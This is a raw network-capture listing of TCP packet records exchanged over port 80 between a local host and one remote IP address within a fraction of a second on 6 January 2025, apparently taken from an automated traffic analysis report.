    Jan 6, 2025 06:03:58.635490894 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.635500908 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.635519981 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.635544062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.635698080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.635709047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.635719061 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.635742903 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.635767937 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.722980976 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.722995043 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723006964 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723025084 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723035097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723046064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723057032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723172903 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723176956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723187923 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723197937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723207951 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723218918 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723237038 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723237038 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723261118 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723450899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723468065 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723478079 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723489046 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723491907 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723500013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723510981 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723516941 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723520994 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723531961 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723541975 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723551989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723552942 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723552942 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723581076 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723608971 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723792076 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723802090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723812103 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723823071 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723835945 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723860025 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723929882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723941088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723949909 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723962069 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723970890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723977089 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723988056 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.723994017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.723998070 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724008083 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724013090 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724018097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724029064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724037886 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724039078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724050045 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724057913 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724060059 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724071026 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724077940 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724081993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724092960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724098921 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724102974 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724112988 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724136114 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724701881 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724713087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724726915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724737883 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724747896 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724751949 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724759102 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724770069 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724775076 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724781036 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724792004 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724795103 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724802017 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724808931 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724819899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.724832058 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.724855900 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725061893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725073099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725081921 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725091934 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725101948 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725116968 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725119114 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725130081 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725136042 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725142956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725151062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725152969 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725162983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725174904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725174904 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725184917 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725194931 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725195885 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725205898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725210905 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725214005 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725222111 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725230932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725240946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725250959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725254059 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725263119 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.725272894 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.725291014 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734031916 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734044075 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734055042 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734083891 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734113932 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734136105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734146118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734155893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734168053 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734174013 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734201908 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734349012 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734359980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734369993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734381914 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734392881 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734400034 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734404087 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734421015 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734446049 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734463930 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734644890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734656096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734666109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734678030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734688044 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734699011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734709024 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734695911 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734719992 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734730005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734738111 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734738111 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734740019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734751940 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.734762907 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734762907 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734791040 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.734983921 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735053062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.735090971 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735101938 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735112906 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735124111 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735130072 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.735138893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735151052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735160112 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.735162020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735177040 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735179901 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.735187054 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.735202074 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.735227108 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813162088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813184977 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813196898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813226938 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813285112 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813296080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813306093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813316107 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813337088 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813347101 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813357115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813358068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813369989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813380957 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813389063 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813390970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813409090 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813430071 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813607931 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813618898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813626051 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813637018 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813647032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813657999 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813673019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813673973 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813683987 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813695908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813700914 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813719988 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813745022 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813936949 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813947916 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813958883 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813970089 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813980103 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813982964 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.813992023 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.813998938 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814002991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814013958 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814023972 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814043045 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814057112 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814223051 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814233065 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814244032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814254999 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814265966 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814273119 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814279079 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814291000 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814294100 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814301968 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814310074 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814338923 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814367056 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814538956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814548969 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814559937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814569950 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814579010 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814582109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814593077 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814604044 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814626932 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814661980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814672947 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814682007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814693928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814697981 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814703941 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814714909 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814718962 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814726114 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814737082 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814747095 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814745903 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814759016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814765930 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814769030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.814785004 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.814800978 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815119982 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815131903 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815141916 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815156937 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815186024 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815366030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815376997 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815392017 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815402985 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815409899 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815413952 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815423965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815431118 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815433979 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815444946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815458059 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815459967 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815470934 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815476894 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815481901 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815493107 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815501928 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815502882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815514088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815521002 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815525055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815536022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815541029 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815546036 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815561056 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815562010 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815572977 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815579891 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815582991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815603971 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815620899 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.815953016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815968990 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.815989017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816019058 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816096067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816107035 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816117048 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816128016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816131115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816138029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816149950 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816157103 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816159010 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816169024 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816180944 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816183090 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816191912 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816198111 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816210032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816221952 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816221952 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816232920 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816241026 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816263914 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816303968 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816483021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816494942 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816504955 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816514015 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816515923 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816534042 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816561937 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816603899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816616058 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816625118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816637039 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816643000 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816646099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816656113 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816664934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816665888 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816668034 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816679001 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816689968 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816696882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816700935 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816715956 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816725016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.816730022 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.816752911 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.817058086 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817070007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817080975 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817091942 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817099094 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.817102909 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817115068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817125082 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.817141056 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.817173004 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904047012 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904170036 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904196978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904207945 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904227972 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904239893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904243946 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904247046 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904257059 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904270887 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904279947 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904287100 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904298067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904306889 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904308081 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904319048 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904325962 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904347897 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904371977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904371977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904392004 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.904491901 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.904503107 CET804970923.27.51.244192.168.2.6
